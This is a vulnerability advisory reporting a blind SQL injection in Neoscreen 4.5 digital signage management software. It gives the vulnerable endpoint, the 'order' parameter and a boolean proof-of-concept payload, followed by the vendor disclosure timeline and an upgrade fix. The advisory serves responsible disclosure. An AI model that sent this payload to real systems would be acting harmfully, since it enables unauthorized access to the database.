Exploit Title: Neoscreen Blind SQL injection Product: Neoscreen by Cube Digital Media Vulnerable Versions: 4.5 and all previous versions Tested Version: 4.5 Advisory Publication: July 24, 2016 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: NONE Credit: Alex Haynes Advisory Details: (1) Vendor & Product Description -------------------------------- Vendor: Cube Digital Media Product & Version: Neoscreen digital signage software v4.5 Vendor URL & Download: http://www.cube-display.fr Product Description: "Neoscreen is an innovative, scalable and particularly powerful communication system. With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. " (2) Vulnerability Details: -------------------------- Several URL's in the management software are vulnerable to SQL injection attacks. Proof of concept: POST TO /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1 Vulnerable parameter: order Payload: idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0 (3) Advisory Timeline: ---------------------- 25/01/2016 - First Contact: vendor responds saying they are working on fix 24/02/2016 - Follow up e-mail to request fix timeline. No vendor response. 03/03/2016 - Follow up e-mail to request fix timeline. 04/03/2016 - Vendor responds saying fix will be available 14/03/2016. (4)Solution: ------------ Upgrade to version 5.0 (5) Credits: ------------ Discovered by Alex Haynes